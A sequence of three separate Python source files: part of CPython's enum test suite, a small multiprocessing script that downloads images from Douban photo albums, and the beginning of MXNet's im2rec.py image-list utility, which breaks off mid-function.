self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, (~i).value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_boundary(self):
self.assertIs(enum.IntFlag._boundary_, EJECT)
class Iron(IntFlag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(IntFlag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(IntFlag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
#
class Bizarre(IntFlag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 5', Iron, 5)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'GREEN' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RW' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Open
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum memmbers before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertTrue(Color.GREEN in Open)
self.assertTrue(Open.RW in Color)
self.assertFalse('GREEN' in Color)
self.assertFalse('RW' in Open)
self.assertTrue(2 in Color)
self.assertTrue(2 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestVerify(unittest.TestCase):
def test_continuous(self):
@verify(CONTINUOUS)
class Auto(Enum):
FIRST = auto()
SECOND = auto()
THIRD = auto()
FORTH = auto()
#
@verify(CONTINUOUS)
class Manual(Enum):
FIRST = 3
SECOND = 4
THIRD = 5
FORTH = 6
#
with self.assertRaisesRegex(ValueError, 'invalid enum .Missing.: missing values 5, 6, 7, 8, 9, 10, 12'):
@verify(CONTINUOUS)
class Missing(Enum):
FIRST = 3
SECOND = 4
THIRD = 11
FORTH = 13
#
with self.assertRaisesRegex(ValueError, 'invalid flag .Incomplete.: missing values 32'):
@verify(CONTINUOUS)
class Incomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 16
FORTH = 64
#
with self.assertRaisesRegex(ValueError, 'invalid flag .StillIncomplete.: missing values 16'):
@verify(CONTINUOUS)
class StillIncomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 11
FORTH = 32
def test_composite(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': aliases b and d are missing combined values of 0x3 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(Flag):
b = 3
c = 4
d = 6
#
self.assertEqual(enum.show_flag_values(3), [1, 2])
class Bizarre(IntFlag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': alias d is missing value 0x2 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(IntFlag):
c = 4
d = 6
self.assertEqual(enum.show_flag_values(2), [2])
def test_unique_clean(self):
@verify(UNIQUE)
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@verify(UNIQUE)
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@verify(UNIQUE)
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@verify(UNIQUE)
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestHelpers(unittest.TestCase):
sunder_names = '_bad_', '_good_', '_what_ho_'
dunder_names = '__mal__', '__bien__', '__que_que__'
private_names = '_MyEnum__private', '_MyEnum__still_private'
private_and_sunder_names = '_MyEnum__private_', '_MyEnum__also_private_'
random_names = 'okay', '_semi_private', '_weird__', '_MyEnum__'
def test_sunder(self):
for name in self.sunder_names + self.private_and_sunder_names:
self.assertTrue(enum._is_sunder(name), '%r is a not sunder name?' % name)
for name in self.dunder_names + self.private_names + self.random_names:
self.assertFalse(enum._is_sunder(name), '%r is a sunder name?' % name)
def test_dunder(self):
for name in self.dunder_names:
self.assertTrue(enum._is_dunder(name), '%r is a not dunder name?' % name)
for name in self.sunder_names + self.private_names + self.private_and_sunder_names + self.random_names:
self.assertFalse(enum._is_dunder(name), '%r is a dunder name?' % name)
def test_is_private(self):
for name in self.private_names + self.private_and_sunder_names:
self.assertTrue(enum._is_private('MyEnum', name), '%r is a not private name?')
for name in self.sunder_names + self.dunder_names + self.random_names:
self.assertFalse(enum._is_private('MyEnum', name), '%r is a private name?')
class TestEnumTypeSubclassing(unittest.TestCase):
pass
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1, boundary=None)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumType:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumType:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumType),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(set(values.keys()), set(result.keys()))
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumType),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumType, object=EnumType.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
self.assertEqual(
len(values), len(result),
"%s != %s" % ([a.name for a in values], [a.name for a in result])
)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_test_simple_enum(self):
@_simple_enum(Enum)
class SimpleColor:
RED = 1
GREEN = 2
BLUE = 3
class CheckedColor(Enum):
RED = 1
GREEN = 2
BLUE = 3
self.assertTrue(_test_simple_enum(CheckedColor, SimpleColor) is None)
SimpleColor.GREEN._value_ = 9
self.assertRaisesRegex(
TypeError, "enum mismatch",
_test_simple_enum, CheckedColor, SimpleColor,
)
class CheckedMissing(IntFlag, boundary=KEEP):
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
CM = CheckedMissing
self.assertEqual(list(CheckedMissing), [CM.SIXTY_FOUR, CM.ONE_TWENTY_EIGHT, CM.TWENTY_FORTY_EIGHT])
#
@_simple_enum(IntFlag, boundary=KEEP)
class Missing:
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
M = Missing
self.assertEqual(list(CheckedMissing), [M.SIXTY_FOUR, M.ONE_TWENTY_EIGHT, M.TWENTY_FORTY_EIGHT])
#
_test_simple_enum(CheckedMissing, Missing)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum, not_exported={'bin', 'show_flag_values'})
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
CONVERT_STRING_TEST_NAME_D = 5
CONVERT_STRING_TEST_NAME_C = 5
CONVERT_STRING_TEST_NAME_B = 5
CONVERT_STRING_TEST_NAME_A = 5 # This one should sort first.
CONVERT_STRING_TEST_NAME_E = 5
CONVERT_STRING_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def setUp(self):
# Reset the module-level test variables to their original integer
# values, otherwise the already created enum values get converted
# instead.
for suffix in ['A', 'B', 'C', 'D', 'E', 'F']:
globals()[f'CONVERT_TEST_NAME_{suffix}'] = 5
globals()[f'CONVERT_STRING_TEST_NAME_{suffix}'] = 5
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexigraphical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(python_version == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(python_version >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.IntEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_STRING_TEST_'))
self.assertEqual(repr(test_type.CONVERT_STRING_TEST_NAME_A), '%s.CONVERT_STRING_TEST_NAME_A' % module)
self.assertEqual(str(test_type.CONVERT_STRING_TEST_NAME_A), 'CONVERT_STRING_TEST_NAME_A')
self.assertEqual(format(test_type.CONVERT_STRING_TEST_NAME_A), '5')
# global names for StrEnum._convert_ test
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
class TestStrEnumConvert(unittest.TestCase):
def setUp(self):
global CONVERT_STR_TEST_1
global CONVERT_STR_TEST_2
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
def test_convert(self):
test_type = enum.StrEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_STR_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_STR_TEST_1, 'hello')
self.assertEqual(test_type.CONVERT_STR_TEST_2, 'goodbye')
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_STR_* found.')
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.StrEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_STR_'))
self.assertEqual(repr(test_type.CONVERT_STR_TEST_1), '%s.CONVERT_STR_TEST_1' % module)
self.assertEqual(str(test_type.CONVERT_STR_TEST_2), 'goodbye')
self.assertEqual(format(test_type.CONVERT_STR_TEST_1), 'hello')
if __name__ == '__main__':
unittest.main()
|
DownloadAlbum_withoutpool.py
|
#coding:utf-8
from __future__ import print_function
import multiprocessing
from bs4 import BeautifulSoup
import os, time, random, urllib
def getHtmlSoup(url):
page = urllib.urlopen(url)
html = page.read()
Soup = BeautifulSoup(html, 'lxml')
return Soup
def getNextpageurl(url):
Soup = getHtmlSoup(url)
nextpagetag = Soup.select('#content > div > div.article > div.paginator > span.next > a')
if nextpagetag:
nextpageurl = nextpagetag[0].get('href')
# print(nextpageurl)
return nextpageurl
else:
return False
def getAllPreviewpage(url):
allPageUrl = [url]
nexturl = url
while nexturl:
nexturl = getNextpageurl(nexturl)
if nexturl:
allPageUrl.append(nexturl)
return allPageUrl
def getCurrrntpageImageUrl(url, pagenumber, foldername):
Soup = getHtmlSoup(url)
photocount = 0
previewtags = Soup.select('#content > div.grid-16-8.clearfix > div.article > div.photolst.clearfix > div > a')
if previewtags:
for i in previewtags:
largeimghref = i.get('href')
Soup = getHtmlSoup(largeimghref)
imgsrctag = Soup.select('#link-report > div.image-show > div > a > img')
imgsrc = imgsrctag[0].get('src')
# print(imgsrc)
# time.sleep(2)
photocount += 1
filename = photocount + pagenumber * 18
path = 'doubanPhotos/%s/' % foldername
if not os.path.exists(path):
os.makedirs(path)
target = path + '%s.jpg' % filename
urllib.urlretrieve(imgsrc, target)
print("正在下载图片%s" % target)
countQueue.put(photocount)
print("--------------------------------------------------\n"
"这里是第%s页的进程 ID:%s\n"
"--------------------------------------------------\n" % (pagenumber + 1, os.getpid()))
print(time.strftime("%Y-%m-%d %A %X %Z", time.localtime()))
# return photocount
def DownloadPhotos(url, foldername):
Allpreviewpagelist = getAllPreviewpage(url)
pagenumber = len(Allpreviewpagelist)
photocount = 0
global countQueue
countQueue = multiprocessing.Queue()
# for i in range(pagenumber):
# photocount += getCurrrntpageImageUrl(Allpreviewpagelist[i], i, foldername)
#
downloadphoto = multiProcess(getCurrrntpageImageUrl, Allpreviewpagelist, pagenumber)
downloadphoto.downloadworks(foldername)
# 从查找页面的所有进程中通过进程通信queue获得每一页的图片
for i in range(pagenumber):
photocount += countQueue.get(True)
print("这个相册有 %s 张图片" % photocount)
class multiProcess(multiprocessing.Process):
"""docstring for multiProcess"""
def __init__(self, func, arg, worknum):
super(multiProcess, self).__init__()
self.func = func
self.arg = arg
self.worknum = worknum
def downloadworks(self, foldername):
proc_record = []
for i in range(self.worknum):
page_url = self.arg[i]
p = multiprocessing.Process(target = self.func, args = (page_url,i,foldername,))
p.daemon = True
p.start()
proc_record.append(p)
for p in proc_record:
p.join()
if __name__ == '__main__':
# url = "https://www.douban.com/photos/album/1632492290/"
# url = "https://www.douban.com/photos/album/82367742/"
# url = "https://www.douban.com/photos/album/117047793/"
url = "https://www.douban.com/photos/album/1621384085/"
t0 = time.time()
DownloadPhotos(url, 'test')
print(time.time()-t0)
|
im2rec.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
curr_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
try:
import multiprocessing
except ImportError:
multiprocessing = None
def list_image(root, recursive, exts):
i = 0
if recursive:
cat = {}
for path, dirs, files in os.walk(root, followlinks=True):
dirs.sort()
files.sort()
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
yield (i, os.path.relpath(fpath, root), cat[path])
i += 1
for k, v in sorted(cat.items(), key=lambda x: x[1]):
print(os.path.relpath(k, root), v)
else:
for fname in sorted(os.listdir(root)):
fpath = os.path.join(root, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
yield (i, os.path.relpath(fpath, root), 0)
i += 1
def write_list(path_out, image_list):
with open(path_out, 'w') as fout:
for i, item in enumerate(image_list):
line = '%d\t' % item[0]
for j in item[2:]:
line += '%f\t' % j
line += '%s\n' % item[1]
fout.write(line)
def make_list(args):
image_list = list_image(args.root, args.recursive, args.exts)
image_list = list(image_list)
if args.shuffle is True:
random.seed(100)
random.shuffle(image_list)
N = len(image_list)
chunk_size = (N + args.chunks - 1) / args.chunks
for i in xrange(args.chunks):
chunk = image_list[i * chunk_size:(i + 1) * chunk_size]
if args.chunks > 1:
str_chunk = '_%d' % i
else:
str_chunk = ''
sep = int(chunk_size * args.train_ratio)
sep_test = int(chunk_size * args.test_ratio)
if args.train_ratio == 1.0:
write_list(args.prefix + str_chunk + '.lst', chunk)
else:
if args.test_ratio:
write_list(args.prefix + str_chunk + '_test.lst', chunk[:sep_test])
if args.train_ratio + args.test_ratio < 1.0:
write_list(args.prefix + str_chunk + '_val.lst', chunk[sep_test + sep:])
write_list(args.prefix + str_chunk + '_train.lst', chunk[sep_test:sep_test + sep])
def read_list(path_in):
with open(path_in) as fin:
while True:
line = fin.readline()
if not line:
break
line = [i.strip() for i in line.strip().split('\t')]
